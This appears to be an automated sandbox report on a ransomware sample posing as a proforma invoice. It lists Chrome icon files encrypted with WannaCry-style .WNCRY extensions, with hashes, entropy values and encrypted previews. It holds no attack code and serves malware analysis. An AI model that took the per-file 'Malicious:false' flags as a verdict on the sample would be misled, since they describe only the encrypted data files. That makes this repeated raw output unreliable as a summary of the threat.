                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2296
                                                          Entropy (8bit):7.925234697817188
                                                          Encrypted:false
                                                          SSDEEP:48:bkb0NLRb4nOtTbwt45TP7GrxV/Pe/397IQxyTDFBitfQwh0+DfwZe:oeSNEirTPYTWDyfQwh0+5
                                                          MD5:0C90D1F6A26BF720EF901ED1714D5D5B
                                                          SHA1:BEF4CED6C51779361762E413A9DBE88164EF0C2C
                                                          SHA-256:537BAF0AF29FBCA989631F35F6F6EC64CB5D99447F823C6F1B989E7F7393C21A
                                                          SHA-512:59E509608257C2A51753BA88FA4A57A5E691CB71B6A713C49D1AC1329C6465A0967ECE60739A60D3302BC6A547B2BA3079726FA0662E08D095B87E698D777783
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....V..M*sT.c&m........U...H..).|F.....>.:..y...c.u.s.../.......V...<.#.)......P.......E.\.S._]...69 ...F...8......(........>E.I..b.l.N..D.P.w5<;S6..V..}A.q....-..\N...........-..F3~r.ci4.O....~@.....f.f{`D....*...4Z..o..z....:}yo.:e&.z.OK.....fn.>Y.3............7.3......0.......n..I,m......z......`.....:.8s.J.Xt<...<.d.[.....x......S....o..px....O8_9....W..`....!.....fZ.....].tI...Z.Q.I..........>-....A.._.....E/rEr=C...I.M<..y.#.,..-r0#.u.6q....?.X0.V.b\.......{j......o.c...A-6..y...q.xR.m...%.\..S...!lT....3$q....v.h0.).NwZF#.............w...$5.....5{.."(....z..t1..k...S. .Q!...JNtx...E.r3...1...^.x.!."...Nu....i.Dkgu).p...AP.>..Z.>.tH.~v.X....p.%.....<|T./.....M........H#.}.".8U.....P.I-....i|.'8!.&..eL...U.......O.L.(.._?.a..mO.....^.ItY.,.K...).h......N.(..V....R..,m...".@..+..v.....5...q-.@.Q.|....d....w@.E..p...Ra.+...A!..-..0;W}...W....?"...8..Yb@0w...?H4=:..p@.3".D..,4...d.(..t..2'K..>,.\2%#E. ..^jVU.lu..*.L...P9d...i4h>{:k...N<...DV..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\192.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1528
                                                          Entropy (8bit):7.84391616669831
                                                          Encrypted:false
                                                          SSDEEP:24:bkN4pQeWMjGt5584Gs9MuhNFKMDtcmchiEoGVfzap8/gaUZfZ/lv7q0KrSSet9c9:bkNQQojG3K4GsqufFKwcPx1eK/gaUZP6
                                                          MD5:2CC24D0EC4D956D23CDAF554A10B4E0B
                                                          SHA1:DB8D76B2898EFC5C96BED125DFE794769553EF8E
                                                          SHA-256:B04C39F3969D17A08C1583D645CE753ADA881D4EAD04D665CF49C5D3692FB693
                                                          SHA-512:1CD90B3008A6DFCF7261BEFF4FBA93500AE0DF1776DDA0F6EB22C668CD1DDA196391E4DEFCB272ED785D40B204D25E6004D58DB60FFCF5882E71B3CC6E77E06A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......?O..|,..u.....L%..a....<....g.i?..0..[..Z......8.....4....q.D..Y..jN.F......S.IX.U...j..@(.-r..G..u....|...8tQ... L.R<[)..0|Z_.t@.D...8.K....*..\....<.O.{.R..rA'.d...W.......$.b...]...R....S.F";u9..?.~.p.....)=Su...._]|..4|...#..H.N...0............|..s...D..`....0:.gK..4,.T...X5O...U..@.w/....Z.1...~....t.Sj..T7...S....;.V....i......h.....$WFa...c.....U.W..SY.F..A..5.|..H.6..6.U6...c..tL...M.....$.....-q.(W..k.I...P..L..K.J6.z~V.....~x..<.y...e*.8,.......X...........jyT.e.j.E....64......Ps2 '....~..mM...z..+v.Y..i.[.........3....(.F...c...5.drIp8...@...2.U.@.s.|8.C$U.....H........5.9.I4. ..SK.A.o..t..l...........^.f..]-.....U..s"...9.e.....%.A/5.w.d4+.Ge|Y/.H;.W.7....b.}j......^..S.$.&'a.x.{.EyY.%{.'.|.ux.N.UcZa6...m5.y.%...O..V..E....d...DM...WD-.J..G.t.............;N..*..3....=p.4.....C...U....-...f..tmK....1f.m..`pk.nl2.j.S.....b....{...... ..L...O1.z.L.x`..8.bW...{...g4......6.h...z..g|+.....4..Y.@.$....k3.+mhP..+

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\192.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1528
                                                          Entropy (8bit):7.84391616669831
                                                          Encrypted:false
                                                          SSDEEP:24:bkN4pQeWMjGt5584Gs9MuhNFKMDtcmchiEoGVfzap8/gaUZfZ/lv7q0KrSSet9c9:bkNQQojG3K4GsqufFKwcPx1eK/gaUZP6
                                                          MD5:2CC24D0EC4D956D23CDAF554A10B4E0B
                                                          SHA1:DB8D76B2898EFC5C96BED125DFE794769553EF8E
                                                          SHA-256:B04C39F3969D17A08C1583D645CE753ADA881D4EAD04D665CF49C5D3692FB693
                                                          SHA-512:1CD90B3008A6DFCF7261BEFF4FBA93500AE0DF1776DDA0F6EB22C668CD1DDA196391E4DEFCB272ED785D40B204D25E6004D58DB60FFCF5882E71B3CC6E77E06A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......?O..|,..u.....L%..a....<....g.i?..0..[..Z......8.....4....q.D..Y..jN.F......S.IX.U...j..@(.-r..G..u....|...8tQ... L.R<[)..0|Z_.t@.D...8.K....*..\....<.O.{.R..rA'.d...W.......$.b...]...R....S.F";u9..?.~.p.....)=Su...._]|..4|...#..H.N...0............|..s...D..`....0:.gK..4,.T...X5O...U..@.w/....Z.1...~....t.Sj..T7...S....;.V....i......h.....$WFa...c.....U.W..SY.F..A..5.|..H.6..6.U6...c..tL...M.....$.....-q.(W..k.I...P..L..K.J6.z~V.....~x..<.y...e*.8,.......X...........jyT.e.j.E....64......Ps2 '....~..mM...z..+v.Y..i.[.........3....(.F...c...5.drIp8...@...2.U.@.s.|8.C$U.....H........5.9.I4. ..SK.A.o..t..l...........^.f..]-.....U..s"...9.e.....%.A/5.w.d4+.Ge|Y/.H;.W.7....b.}j......^..S.$.&'a.x.{.EyY.%{.'.|.ux.N.UcZa6...m5.y.%...O..V..E....d...DM...WD-.J..G.t.............;N..*..3....=p.4.....C...U....-...f..tmK....1f.m..`pk.nl2.j.S.....b....{...... ..L...O1.z.L.x`..8.bW...{...g4......6.h...z..g|+.....4..Y.@.$....k3.+mhP..+

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\256.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4856
                                                          Entropy (8bit):7.961756314144701
                                                          Encrypted:false
                                                          SSDEEP:96:ogG6r1v8g0ciX7721sToYzoBJK+kpaxvTa7Sdq6d2nLBLgLT:DG6ho77CsTzz0JK+kpWPdsLBLm
                                                          MD5:7A76D42FFF6CD4A4B1A7C8E69D2D9C9A
                                                          SHA1:BB97516BFE5E6BDF61DCE30B855F0A24B5A942AB
                                                          SHA-256:79A4FF85A0E1C830A464665010391032B61D61A006996033D78A83C0F4397494
                                                          SHA-512:93A2D82693DF15A378AB6BF665376E4198A52BA21A1CB58B9B8CF7F4EB2B11C3897D14557A93BF0917F6FC0030AB4A0C842A468807F9D7FB0F349D52AF7F3C11
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Qw.....s.M.['...&Z.........HL.;.Y.... ?.T.hv...r..m.f.7t7.-..TU....>....$,..v$.....7)...4x./W5.*...!.. %.....g]|..w..k.7....b.....KC...].. .M.a.o...["..a...._w...0.......Y..Y28D......B.....9nne.........../.......u...R....p?.}..0{..U.H2...G.Bm..............a.......7I:.f]@T..8\/T.../.1........nh..m....Z(R..>L...%5.....iNZ..a.e..Y....<.g/.J..,;...2].[.V...Mo....n%.7ls..,..p...........Wa<.C...H.WaTpy.Py....x.....3Q..V3G.h.M....-.......'.3..eX...3.M.%.....v6..8...w.8I2I...?..y.5....-..Y.5u.b..R.a..5...l^.J.m......n.1Ih=.?.<1....Fu$QQ.......7$l...Q.zM.:.......!...K~..!.....u....u..w{~M.r..2v..@G..Z..1|...e..AO.m3b..~4Zu......+.y.^.{.q....#...rT{.j.!.....u..J.,..N\...>.H..a.c..^.E/.Nd6l...g...._..iRG..ey..{.ev..z. A.)....1..J.f'....*...e1......N.c.. .a.a..S.F...>..f.....$T|.....sZi.Bj)i..m.A....%..b.....eG.7.."+..p.....i.V...m.C7..A.u...9..A@\..=.&...rug ..2u........h..x...XL...v.i9..F.....m.~.c....&T0t.F...0..........q.l..OL.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\256.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4856
                                                          Entropy (8bit):7.961756314144701
                                                          Encrypted:false
                                                          SSDEEP:96:ogG6r1v8g0ciX7721sToYzoBJK+kpaxvTa7Sdq6d2nLBLgLT:DG6ho77CsTzz0JK+kpWPdsLBLm
                                                          MD5:7A76D42FFF6CD4A4B1A7C8E69D2D9C9A
                                                          SHA1:BB97516BFE5E6BDF61DCE30B855F0A24B5A942AB
                                                          SHA-256:79A4FF85A0E1C830A464665010391032B61D61A006996033D78A83C0F4397494
                                                          SHA-512:93A2D82693DF15A378AB6BF665376E4198A52BA21A1CB58B9B8CF7F4EB2B11C3897D14557A93BF0917F6FC0030AB4A0C842A468807F9D7FB0F349D52AF7F3C11
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Qw.....s.M.['...&Z.........HL.;.Y.... ?.T.hv...r..m.f.7t7.-..TU....>....$,..v$.....7)...4x./W5.*...!.. %.....g]|..w..k.7....b.....KC...].. .M.a.o...["..a...._w...0.......Y..Y28D......B.....9nne.........../.......u...R....p?.}..0{..U.H2...G.Bm..............a.......7I:.f]@T..8\/T.../.1........nh..m....Z(R..>L...%5.....iNZ..a.e..Y....<.g/.J..,;...2].[.V...Mo....n%.7ls..,..p...........Wa<.C...H.WaTpy.Py....x.....3Q..V3G.h.M....-.......'.3..eX...3.M.%.....v6..8...w.8I2I...?..y.5....-..Y.5u.b..R.a..5...l^.J.m......n.1Ih=.?.<1....Fu$QQ.......7$l...Q.zM.:.......!...K~..!.....u....u..w{~M.r..2v..@G..Z..1|...e..AO.m3b..~4Zu......+.y.^.{.q....#...rT{.j.!.....u..J.,..N\...>.H..a.c..^.E/.Nd6l...g...._..iRG..ey..{.ev..z. A.)....1..J.f'....*...e1......N.c.. .a.a..S.F...>..f.....$T|.....sZi.Bj)i..m.A....%..b.....eG.7.."+..p.....i.V...m.C7..A.u...9..A@\..=.&...rug ..2u........h..x...XL...v.i9..F.....m.~.c....&T0t.F...0..........q.l..OL.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\32.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1208
                                                          Entropy (8bit):7.828168510161053
                                                          Encrypted:false
                                                          SSDEEP:24:bkNOKxQawlRPMtDzfZUQJX8yCT6qw3UTFH20mgLxeT+DgqtzZ29lUbqiR0+G:bkwLlRElfaQBtCT9akHtmgwa8qtKlUbo
                                                          MD5:25626A267EB9B02ADAA7D27AB1A271B6
                                                          SHA1:47273543E8B5A3C1F48BC7E1EE07AE09DF06C03B
                                                          SHA-256:9AD374F2DC2E2A615F643215C84F68A7AC4194DAAC2CE89E8A7348E9C0E4B433
                                                          SHA-512:6A8EB819A20621EFE7763E254238E1B9CD0ECE1AB078B4337A5B14B0762ECAD184631D6E9FC206666B4A0D7D67DC24676AA82A5E410D80AC4E349351C2A8E3C8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Z.!<M.s.q..,..V].......s.S.@.`..uL..G3..[.....H...{..*......N%...>...M..>.B....W.M.N.'.1.....g.!_...+i.6r...@.:.....n.@b...k.Ze..<.s.H..P.f.-Ih...a.,z.D.......2.P.......Ip:@.AD.!e....i...r;.U...X........:..%...*...$....E<.d..OC..$."..x.i]t.)............fm2x.L6......}*...6>Lb).I..e..B...D]).-o...3B.K.*DS.a.@E....y...V.f.......DH.........H.:....x...kb...j.........1..T.N...jh.G...I.]...._.e......v4j|..L&..K...A.......$.-.....Bb.-#...........$ ,...5....C.... ....M.1B.^...c..4.t#...>..l#..[........q.K..2.....CA.+.5........!:..6.R..#...4.~H^.A2..%r*......2Q..v...GC.1[.2....a.....'q.J..KE..|$..Bt...o...........k.8!+Tc/....xDt.\>....u...v...B.*x.m....~H.s..#.{.....3..f.0. (.r.F..J6.n........E.H..~6.@jPZ<T...`...o....{.IE.....O...-b..)...s..k0.........Q.....QHe..-.a.%"...6.....d><.....gPk|.TAX....?....q..`.....2a...2RP`.p{.....Fc.c-,.M.9_..F752[.9.u.@y_6K..U..,s4..{&.<I....^XVxp.N...+.L.c.W..;8.LM.....B....e.....T%WT...Z._.n8

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\32.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1208
                                                          Entropy (8bit):7.828168510161053
                                                          Encrypted:false
                                                          SSDEEP:24:bkNOKxQawlRPMtDzfZUQJX8yCT6qw3UTFH20mgLxeT+DgqtzZ29lUbqiR0+G:bkwLlRElfaQBtCT9akHtmgwa8qtKlUbo
                                                          MD5:25626A267EB9B02ADAA7D27AB1A271B6
                                                          SHA1:47273543E8B5A3C1F48BC7E1EE07AE09DF06C03B
                                                          SHA-256:9AD374F2DC2E2A615F643215C84F68A7AC4194DAAC2CE89E8A7348E9C0E4B433
                                                          SHA-512:6A8EB819A20621EFE7763E254238E1B9CD0ECE1AB078B4337A5B14B0762ECAD184631D6E9FC206666B4A0D7D67DC24676AA82A5E410D80AC4E349351C2A8E3C8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Z.!<M.s.q..,..V].......s.S.@.`..uL..G3..[.....H...{..*......N%...>...M..>.B....W.M.N.'.1.....g.!_...+i.6r...@.:.....n.@b...k.Ze..<.s.H..P.f.-Ih...a.,z.D.......2.P.......Ip:@.AD.!e....i...r;.U...X........:..%...*...$....E<.d..OC..$."..x.i]t.)............fm2x.L6......}*...6>Lb).I..e..B...D]).-o...3B.K.*DS.a.@E....y...V.f.......DH.........H.:....x...kb...j.........1..T.N...jh.G...I.]...._.e......v4j|..L&..K...A.......$.-.....Bb.-#...........$ ,...5....C.... ....M.1B.^...c..4.t#...>..l#..[........q.K..2.....CA.+.5........!:..6.R..#...4.~H^.A2..%r*......2Q..v...GC.1[.2....a.....'q.J..KE..|$..Bt...o...........k.8!+Tc/....xDt.\>....u...v...B.*x.m....~H.s..#.{.....3..f.0. (.r.F..J6.n........E.H..~6.@jPZ<T...`...o....{.IE.....O...-b..)...s..k0.........Q.....QHe..-.a.%"...6.....d><.....gPk|.TAX....?....q..`.....2a...2RP`.p{.....Fc.c-,.M.9_..F752[.9.u.@y_6K..U..,s4..{&.<I....^XVxp.N...+.L.c.W..;8.LM.....B....e.....T%WT...Z._.n8

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\48.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1368
                                                          Entropy (8bit):7.8552504080538785
                                                          Encrypted:false
                                                          SSDEEP:24:bkf0EluvzyHTxOQ2K83o5IdaWJiZeu6MNbIFDCv/GTU3+w:bkf0lwTx7tJIQDeaMFmvgI+w
                                                          MD5:E0C3318D4A13DCAE845139F69766955D
                                                          SHA1:5616A6C4613F626851FC0188AFEA0262207EE3D3
                                                          SHA-256:7AFCB8E7EE9B4A1BB50BB2C217B60AEE9DF027E4869B58086BA79CA922AF6BC7
                                                          SHA-512:7D87BFA05B668C2142DB2FBDD7166B660BFCD88D492A983F26BCDD12F2E940D5DEE00681EE4760604F457503A0B930F2E1FA91D988BE9D0AA557C60E851ED314
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....>..f.i..f.Y...).......b.>!.O...e.k....s...i.)..p"..#Q.h......K....Ml.....tE.10V. ...... 7{....j.]Q%.I..m......^....'..K[....&...ou..n.....z.{,.+D.F.O<..j...7.u7.....S<...(.....a.Q...bm...;....m..A.#K....6..6bgbY..C.kyP..PWUt.#=f....!..0F.(.......@.......hL.K&.4.+."..1...ZU.8hZ..m...\......21...[f.......J9...Xf5=;..'.Y>..".!R........nf...).L.b.....kK.L..<-.}r{,UDJ(6o..'5.....,..$t.Y.a.Y.PB.9=E.... ..B...FZ...6.;A.$.........X...x...fS._.Q.`....\.4.n4N...G....+.T..6}.?.-... .M r.72%.iM|..B-e......V).._B...>).w......K.}a..*..W..D)......Qk........yy...[............I$.>`.._P..q.Q....su..lFoi`.RF.%..f.6{..+t.).....5.m......,.K...M.n......2.b......U....j.W. ..h.<"..._....YI..z..#...T.2.i..c.NU.P,]E..U..@...:....f0......s...p...U...x.%..;k....).qAd7J.t@E.|b.*.R....O...Smh.=..K....8..zn.w..)..uc....K.s..&..../.L.v......nC...-='-.....YJG.L.S..&....eA:.1..F.6.....uP,..%.h`/.@...e-v.k......](..".'.m.....N........G..99U.)y}.L..5......?:........

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\48.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1368
                                                          Entropy (8bit):7.8552504080538785
                                                          Encrypted:false
                                                          SSDEEP:24:bkf0EluvzyHTxOQ2K83o5IdaWJiZeu6MNbIFDCv/GTU3+w:bkf0lwTx7tJIQDeaMFmvgI+w
                                                          MD5:E0C3318D4A13DCAE845139F69766955D
                                                          SHA1:5616A6C4613F626851FC0188AFEA0262207EE3D3
                                                          SHA-256:7AFCB8E7EE9B4A1BB50BB2C217B60AEE9DF027E4869B58086BA79CA922AF6BC7
                                                          SHA-512:7D87BFA05B668C2142DB2FBDD7166B660BFCD88D492A983F26BCDD12F2E940D5DEE00681EE4760604F457503A0B930F2E1FA91D988BE9D0AA557C60E851ED314
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....>..f.i..f.Y...).......b.>!.O...e.k....s...i.)..p"..#Q.h......K....Ml.....tE.10V. ...... 7{....j.]Q%.I..m......^....'..K[....&...ou..n.....z.{,.+D.F.O<..j...7.u7.....S<...(.....a.Q...bm...;....m..A.#K....6..6bgbY..C.kyP..PWUt.#=f....!..0F.(.......@.......hL.K&.4.+."..1...ZU.8hZ..m...\......21...[f.......J9...Xf5=;..'.Y>..".!R........nf...).L.b.....kK.L..<-.}r{,UDJ(6o..'5.....,..$t.Y.a.Y.PB.9=E.... ..B...FZ...6.;A.$.........X...x...fS._.Q.`....\.4.n4N...G....+.T..6}.?.-... .M r.72%.iM|..B-e......V).._B...>).w......K.}a..*..W..D)......Qk........yy...[............I$.>`.._P..q.Q....su..lFoi`.RF.%..f.6{..+t.).....5.m......,.K...M.n......2.b......U....j.W. ..h.<"..._....YI..z..#...T.2.i..c.NU.P,]E..U..@...:....f0......s...p...U...x.%..;k....).qAd7J.t@E.|b.*.R....O...Smh.=..K....8..zn.w..)..uc....K.s..&..../.L.v......nC...-='-.....YJG.L.S..&....eA:.1..F.6.....uP,..%.h`/.@...e-v.k......](..".'.m.....N........G..99U.)y}.L..5......?:........

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\64.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1512
                                                          Entropy (8bit):7.860510281006179
                                                          Encrypted:false
                                                          SSDEEP:24:bkFIs6IYi87QKLTXwOVVyzbCR1xKni2xyq38zYVXU2xNjYdf36E03oOfLtRbNWjS:bk/eLTgYy3il2xm8VkKjmf36lvL/gmA0
                                                          MD5:414790AA06DC87778D049709FB7DA832
                                                          SHA1:5E1DE14C824BF739477B74865DCD60BCEF12B9B9
                                                          SHA-256:C5DAC9C5CC7B09494494A9C82411DD7DBE0BC4BA5E63057C54777ECB05EC2F87
                                                          SHA-512:D826D4ED4F659BDFD982CBB2779D649479AB5A7F129EC14645426EB205A63C011B81A1219E7431D98AEC739AEB2BA0B52AA26DB7FF26A004D5806E9F2710EDC1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....c...g..E...K.x{...~Z]..)R)...+.(....h5(..&..<...g..)..u......g.+.t-G...[.c..L0Q..jG.Q..S^...S....M.....g[..kA).=h&v....5..Q.....T...n....y..i..#L..-Q...|..r..xB..(>.v.Q..q.C3..b4....Lo.....*.$.w8.F.X......?.Nb)...N...$..I%N[...G..v*..>....5..Xc..............A..".1.u..z5..O..P.#.F.vM..4....2=.!..~..*rO...O.pGM-..1.E..]"...p.v..-3.r. .4..I.,...OE.HNh......M\..H.`...J...... ...Mw+.''..SM...q.v./.:.Y{.7...dl.e..K.Y...........M.*..[.....Kj).%.j..x)m....0...:.M.4..H.]}..`....q.m..,.....CTV..+%.x.3.Oz.)....=...X..Fvh.2...,..G....JzD...x.u.ND...@.Y.e.../.4.S73..!.#[..$z>..W.+...U?U+.O....i..L.+.TO~..Q^..~..,.. \.D..p..P..e..`+g`Z..F|.B.p.....J...e....U.O.).4.f..%.O+..MLJ..-.w4..6.*...8SDR....A|.{{.dt....2.q....#...(K1....?..|.d...?|Q............H.m. ..)..Sd.|.T=......VX.8.|...RFg.y.5$...e.*..{5..!....%S.4..>c.3.6...v.._..mJ?..1+....t.M..k".d^..d&.'...B.....;...i3\.p......].y.xN_9>t$...;m.....%k......^,..C.G.y.F.....v.....[tOh9..?...

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\64.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1512
                                                          Entropy (8bit):7.860510281006179
                                                          Encrypted:false
                                                          SSDEEP:24:bkFIs6IYi87QKLTXwOVVyzbCR1xKni2xyq38zYVXU2xNjYdf36E03oOfLtRbNWjS:bk/eLTgYy3il2xm8VkKjmf36lvL/gmA0
                                                          MD5:414790AA06DC87778D049709FB7DA832
                                                          SHA1:5E1DE14C824BF739477B74865DCD60BCEF12B9B9
                                                          SHA-256:C5DAC9C5CC7B09494494A9C82411DD7DBE0BC4BA5E63057C54777ECB05EC2F87
                                                          SHA-512:D826D4ED4F659BDFD982CBB2779D649479AB5A7F129EC14645426EB205A63C011B81A1219E7431D98AEC739AEB2BA0B52AA26DB7FF26A004D5806E9F2710EDC1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....c...g..E...K.x{...~Z]..)R)...+.(....h5(..&..<...g..)..u......g.+.t-G...[.c..L0Q..jG.Q..S^...S....M.....g[..kA).=h&v....5..Q.....T...n....y..i..#L..-Q...|..r..xB..(>.v.Q..q.C3..b4....Lo.....*.$.w8.F.X......?.Nb)...N...$..I%N[...G..v*..>....5..Xc..............A..".1.u..z5..O..P.#.F.vM..4....2=.!..~..*rO...O.pGM-..1.E..]"...p.v..-3.r. .4..I.,...OE.HNh......M\..H.`...J...... ...Mw+.''..SM...q.v./.:.Y{.7...dl.e..K.Y...........M.*..[.....Kj).%.j..x)m....0...:.M.4..H.]}..`....q.m..,.....CTV..+%.x.3.Oz.)....=...X..Fvh.2...,..G....JzD...x.u.ND...@.Y.e.../.4.S73..!.#[..$z>..W.+...U?U+.O....i..L.+.TO~..Q^..~..,.. \.D..p..P..e..`+g`Z..F|.B.p.....J...e....U.O.).4.f..%.O+..MLJ..-.w4..6.*...8SDR....A|.{{.dt....2.q....#...(K1....?..|.d...?|Q............H.m. ..)..Sd.|.T=......VX.8.|...RFg.y.5$...e.*..{5..!....%S.4..>c.3.6...v.._..mJ?..1+....t.M..k".d^..d&.'...B.....;...i3\.p......].y.xN_9>t$...;m.....%k......^,..C.G.y.F.....v.....[tOh9..?...

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\96.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1752
                                                          Entropy (8bit):7.890161575573857
                                                          Encrypted:false
                                                          SSDEEP:48:bkEbTIFjZ1aDybDlOb6/X9o7vgKnwNe1pQA1YCHkspmO+WTMK:oEMFN+Ep1o7vvwNupjWCE1K
                                                          MD5:B54C35DCECF5A3835A70F9807BFBD06C
                                                          SHA1:29C9BB6D0E06C1E0FAF76249219AE7313573513A
                                                          SHA-256:A6CF5B44A8ED339FB1992AD76EFB6A29C6360CFD0D703C6386F3752609C91E41
                                                          SHA-512:20B74E2A7E87BCA63374CE5F4C029A7A26106BED57B8690740A1A69152D1275DFDB00AB905063815732718E1094984A114F9BB726DF0788AC4499AA67AACC600
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....T.d...h.8..E.v,~.3l.i.4h\.i.W....(...(....L.k.j.VU...>.&.r..`..{e.;.'`.<.>..q....(..vR..B".&.....V.L.\.d.?........Q..*z\^\...*2P.h..b..Oi.+#...+].&..[2...Tc>..{.4.Z..|]..........7J..".\~..p....}..}. F--...........:.P..E.9..!..z.....t..`..)............bw.......T...sz...g.~...A?....G\Oa.....3D.....V...N.....M.....o..a.t8.F..U6.k.5....z.}.%5`.j.....AF..2].Oz_O.,..S..7..a.p...w.b.>n.....B......Dh.....}7...1@.r...H.I].Rw$....$...@P....}`.;..pj7 ......t}....CU&..!jr....\.'l]..E_.......+..f....^/.....oxG...].s...*.....0.;.v.."..9..H...1`a8...&..'s.r.r..L.....WcGw'.H....KJ..g....N."o.{.Q.m{.<..k.q..b..k\2.x}..n.V.u..i..x.;FE..o.D<.. !*<.B.z...,..o.k a....(.q&....S.K..>....K..v....b36.r.....[dw^C.R.8[.K.....k*.o#.k"..U..i...fA.`.D...p~...0..7F.w..rc.[...4.v...,......P.:....4.u...1.Y......95h>.n...Cn..?)eo.rN.......Q.Vrb....o.....%)?z*0..ubIb........zT.u.qQ:..V!g....&T...X.]..c,q_.qS. ?....v.S%u.#.L.[.)G.....*".px.w..-R...-.......

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\96.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1752
                                                          Entropy (8bit):7.890161575573857
                                                          Encrypted:false
                                                          SSDEEP:48:bkEbTIFjZ1aDybDlOb6/X9o7vgKnwNe1pQA1YCHkspmO+WTMK:oEMFN+Ep1o7vvwNupjWCE1K
                                                          MD5:B54C35DCECF5A3835A70F9807BFBD06C
                                                          SHA1:29C9BB6D0E06C1E0FAF76249219AE7313573513A
                                                          SHA-256:A6CF5B44A8ED339FB1992AD76EFB6A29C6360CFD0D703C6386F3752609C91E41
                                                          SHA-512:20B74E2A7E87BCA63374CE5F4C029A7A26106BED57B8690740A1A69152D1275DFDB00AB905063815732718E1094984A114F9BB726DF0788AC4499AA67AACC600
                                                          Malicious:false
                                                          Reputation:unknown
